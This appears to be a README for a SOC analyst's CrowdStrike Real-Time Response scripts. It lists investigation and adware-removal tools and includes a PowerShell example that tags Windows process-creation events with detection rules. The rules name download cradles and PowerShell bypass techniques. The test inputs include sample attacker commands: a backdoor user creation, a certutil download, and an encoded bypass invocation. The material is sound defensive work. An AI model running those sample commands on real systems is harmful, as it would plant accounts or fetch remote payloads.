Since 2021, I have developed a number of scripts to assist me with my investigations and remediation efforts. I figured, why not share them with the public, in the hope they help you.
The scripts I developed are intended to work with CrowdStrike Endpoint Detection and Response (EDR). They are essentially cloud scripts for Real-Time Response (RTR) that let you remediate a device remotely with a single click.
The purpose of my scripts is to assist a SOC or Incident Response Analyst with their investigation. Some scripts assist with remediation of a particular piece of unwanted software or adware. Other scripts assist with investigating a particular system by username to provide more visibility.
- WinInspect - WinInspect is a light-weight tool to assist an analyst with providing more visibility into a Windows system based on a target username.
- MACInspect - MACInspect is a light-weight tool to assist an analyst with providing more visibility into a macOS system based on a target username.
- LinInspect - LinInspect is a light-weight tool to assist an analyst with providing more visibility into a Linux system based on a target username.
- EnumChromeExt - EnumChromeExt retrieves Chrome Extensions and automatically attempts to detect the name.
- Win-PortScanner - Win-PortScanner is an extremely light port scanner.
- ScanDll - ScanDll is a tool to help search processes for a particular dynamic-link library.
- ScanDllv2 - ScanDllv2 is a tool designed to search processes for a specific dynamic-link library using C#. It's much faster than ScanDll, but the output is written to a log file due to issues with standard output display on the CrowdStrike RTR UI.
- RegScanner - An amazingly fast tool designed to search for a registry key or value using a unique keyword.
- UnloadDll - Another amazingly fast tool designed to search for a dynamic-link library loaded in the memory of the process and attempts to unload it using FreeLibrary.
- Win-DiskImage-Toolkit - A simple tool to quickly enumerate or unmount a disk image.
- ScreenConnect-C2Extractor - ScreenConnect-C2Extractor retrieves the C2 from the user.config of the ScreenConnect (aka ConnectWise Control) client.
- Win-PacketCapture - A guided script to generate a packet dump for analysis.
- jsonspection - JSONSpection is a utility designed to thoroughly inspect and enumerate JSON data structures. It helps you break down complex or nested JSON blobs, identify all key-value paths, and understand the overall schema and relationships within the data. This makes it useful for debugging APIs, analyzing logs, or preparing data for parsing and automation workflows.
- EvidenceCollection - This script collects common user document types—such as Word files, Excel spreadsheets, text files, PDFs, and emails—from a specified user’s Downloads, Documents, and Desktop directories. It automatically creates the C:\temp\SIRT directory (if it does not already exist) and copies all matching files into that location for centralized review, evidence preservation, or incident investigation. The file types, directories, and username can be customized to fit the needs of the case.
- Win-DmpEventLogs - Win-DmpEventLogs is an extremely useful forensic tool that dumps Windows Event Logs within a specified time range: 1 = last 24 hours, 7 = last week, 30 = last month, 0 = all events. Basic rules have been implemented to assist in identification:
  - Process Execution Rules (Event ID 4688)
    - Net.exe Execution - General net.exe usage
    - Net User/Group - Net user/group commands
    - Net Share - Net share/use commands
    - Whoami Execution - Whoami command execution
    - Systeminfo Execution - Systeminfo command
    - Tasklist Execution - Tasklist command
    - Nslookup Execution - Nslookup command
    - Ping Sweep - Ping with -n or -t flags
    - PowerShell Encoded - PowerShell with encoded commands
    - PowerShell Bypass - PowerShell execution-policy bypass techniques
    - PowerShell Download - PowerShell download strings
    - Certutil Download - Certutil used for downloads
    - BITSAdmin Download - BITSAdmin transfer/download
    - WMIC Process - WMIC process execution
    - Scheduled Task - Scheduled task creation/execution
    - Registry Modification - Registry add/delete operations
    - Service Creation - Service creation/start
  - Authentication & Access Rules
    - Network Logon - Network logon (LogonType 3)
    - Failed Admin Logon - Failed logon to the Administrator account
    - Explicit Credential Use - Logon using explicit credentials (Event ID 4648)
    - Privilege Escalation - Special privileges assigned to a new logon (Event ID 4672)
  - Account Management Rules
    - User Account Created - Event ID 4720
    - Group Member Added - Member added to a security-enabled global group (Event ID 4728)
  - System Configuration Rules
    - Service Installation - Event ID 4697 (Security log)
    - Service Modified - New service installed, Event ID 7045 (System log)
    - Driver Load - Event ID 219 (System log)
    - Audit Policy Change - Event ID 4719
    - Network Share Added - Event ID 5142
    - WFP Blocked - Windows Filtering Platform blocked connection (Event ID 5157)
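To show how rule tagging of this kind works in practice, here is an added PowerShell example written for this page; it is not the repository's Win-DmpEventLogs code and its regexes are my own approximations of the rule descriptions above, not the tool's patterns. It pulls Security 4688 (process creation) events for the same 1/7/30/0-day window convention, tags each one that matches a rule, and writes the result to a CSV under C:\temp\SIRT (the directory the page's EvidenceCollection script also uses) rather than to standard output, since the page notes RTR's console display can be unreliable. The function names `Get-RuleMatches` and `Get-Tagged4688` and the sample command lines are this example's own constructions.

```powershell
# Added example, not Win-DmpEventLogs itself: tag 4688 process-creation events with simple rules.
param(
    [ValidateSet(0, 1, 7, 30)]
    [int]$Days = 1,                                  # 1 = last 24h, 7 = last week, 30 = last month, 0 = all
    [string]$OutFile = 'C:\temp\SIRT\4688_tagged.csv'
)

# Build the Get-WinEvent filter; omit StartTime when the caller asks for everything.
$filter = @{ LogName = 'Security'; Id = 4688 }
if ($Days -gt 0) { $filter['StartTime'] = (Get-Date).AddDays(-$Days) }

# Rule name -> regex tested against "NewProcessName CommandLine". Approximations for illustration only.
$rules = [ordered]@{
    'Net User/Group'        = '(?i)\bnet1?(\.exe)?\s+(user|group|localgroup)\b'
    'Net Share'             = '(?i)\bnet1?(\.exe)?\s+(share|use)\b'
    'Whoami Execution'      = '(?i)\bwhoami(\.exe)?\b'
    'PowerShell Encoded'    = '(?i)powershell.*\s-(e|ec|enc|encodedcommand)\s'
    'PowerShell Bypass'     = '(?i)powershell.*\s-(ep|executionpolicy)\s+bypass\b'
    'PowerShell Download'   = '(?i)(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)'
    'Certutil Download'     = '(?i)certutil.*-urlcache'
    'BITSAdmin Download'    = '(?i)bitsadmin.*\s/(transfer|addfile)\b'
    'WMIC Process'          = '(?i)wmic.*\sprocess\s+call\s+create\b'
    'Scheduled Task'        = '(?i)schtasks.*\s/(create|run)\b'
    'Registry Modification' = '(?i)\breg(\.exe)?\s+(add|delete)\b'
    'Service Creation'      = '(?i)\bsc(\.exe)?\s+(create|start)\b'
}

function Get-RuleMatches {
    # Returns the names of every rule whose pattern hits the given command line (empty array if none).
    param([string]$CommandLine)
    @($rules.GetEnumerator() | Where-Object { $CommandLine -match $_.Value } | ForEach-Object { $_.Key })
}

function Get-Tagged4688 {
    # Reads 4688 events matching the filter and emits one object per event that hit at least one rule.
    param([hashtable]$FilterHashtable)
    Get-WinEvent -FilterHashtable $FilterHashtable -ErrorAction SilentlyContinue | ForEach-Object {
        $xml = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        # CommandLine is blank unless "Include command line in process creation events" is enabled,
        # so the image path is always included to keep the rules useful on default audit settings.
        $cmd = ('{0} {1}' -f $d['NewProcessName'], $d['CommandLine']).Trim()
        $hits = Get-RuleMatches -CommandLine $cmd
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                User        = '{0}\{1}' -f $d['SubjectDomainName'], $d['SubjectUserName']
                Parent      = $d['ParentProcessName']
                CommandLine = $cmd
                Rules       = ($hits -join '; ')
            }
        }
    }
}

# Constructed sample command lines (not real telemetry) to sanity-check the rules offline.
$samples = @(
    'C:\Windows\System32\net.exe user backdoor P@ss123 /add',
    'C:\Windows\System32\certutil.exe -urlcache -split -f http://example.invalid/a.exe a.exe',
    'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -ep bypass -enc SQBFAFgA',
    'C:\Windows\System32\notepad.exe'
)
foreach ($s in $samples) { '{0,-40} <- {1}' -f ((Get-RuleMatches $s) -join ', '), $s }

# Live collection: write tagged events to disk for retrieval with RTR "get".
New-Item -ItemType Directory -Force -Path (Split-Path $OutFile) | Out-Null
$tagged = @(Get-Tagged4688 -FilterHashtable $filter)
$tagged | Export-Csv -Path $OutFile -NoTypeInformation
'{0} tagged 4688 event(s) written to {1}' -f $tagged.Count, $OutFile
```

Run it from an elevated prompt (reading the Security log requires administrator rights), for example `.\Tag-4688.ps1 -Days 7`. Expect many legitimate hits from rules such as Whoami Execution and Net User/Group; the value of tagging is narrowing a week of process creations down to the handful worth reading by hand, not producing verdicts.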
- CSSession - CSSession is a CrowdStrike API script that connects to a host via Real-Time Response when you pass the target hostname as an argument. You must have the appropriate API permissions, and your client ID and secret must be correct, to use this script.
- CrowdStrike-API-queued-script - CrowdStrike API Queued script lets you queue a cloud script of your choice against a target host. You must have the appropriate API permissions, and your client ID and secret must be correct, to use this script.
The following library contains a collection of remediation scripts designed to remove common unwanted software, adware, and malware found in the wild. If you come across a particular program you’d like to remediate, feel free to download the corresponding script and use it in your environment.
- 123Movies
- 39bar
- AceLauncher
- AppMaster
- AppRun
- AskPartnerNetwork
- Ask Toolbar
- BBSK(SecureBrowser)
- Bloom
- BrightTramp
- BrowserAssistant
- ByteFence
- Calendaromatic
- Cash
- Clearbar
- Convertmate
- CrystalPDF
- DSOne Agent
- DebuggerStepperBoundaryAttribute
- DriverSupportAOsvc
- DriverTonic
- Easy2Convert
- Editor
- ElevenClock
- Energy
- Epibrowser
- Framework
- Gallery
- GameCenter
- GamerHash
- Headlines
- Healthy
- IBuddy
- LiteBrowser
- Music
- OneBrowser
- OneLaunch
- OneStart
- Ouroborosbrowser
- PCAcceleratePro
- PCAppStore
- PCHelpSoftDriverUpdater
- PC_Cleaner
- PDFArchitect
- PDFMaker
- PDFProSuite
- PDFSpark
- PDFTool
- PDFast
- PDFunk
- Player
- PowerDoc
- Prime
- RecipeListener
- ReimageProtector
- RemotePC
- Restoro
- ShiftBrowser
- Sleuth
- SlimCleaner
- Sogou
- Strength
- Taskbarsystem
- Tone
- Walliant
- WaveBrowser
- WebDiscoverBrowser
- Wellness
- XMRig
- flbmusic
- leading
- streaming
- streamlink-twitch-gui
Do you find my work helpful and want to show your support? Feel free to add me on Twitter. If you'd like to show even more support, you can also tip me at Ko-Fi. There's absolutely no pressure to do so; I appreciate your support either way!
If you would like to contribute by providing your own remediation script, it would be greatly appreciated. Any help in keeping the public safe is highly valued. Please ensure that the code is clear and concise to ensure a smooth review and validation process. Submissions can be sent as an issue. The contributor's name will be associated with the remediation script.
If you run into any issues with a script, please feel free to report it as an issue.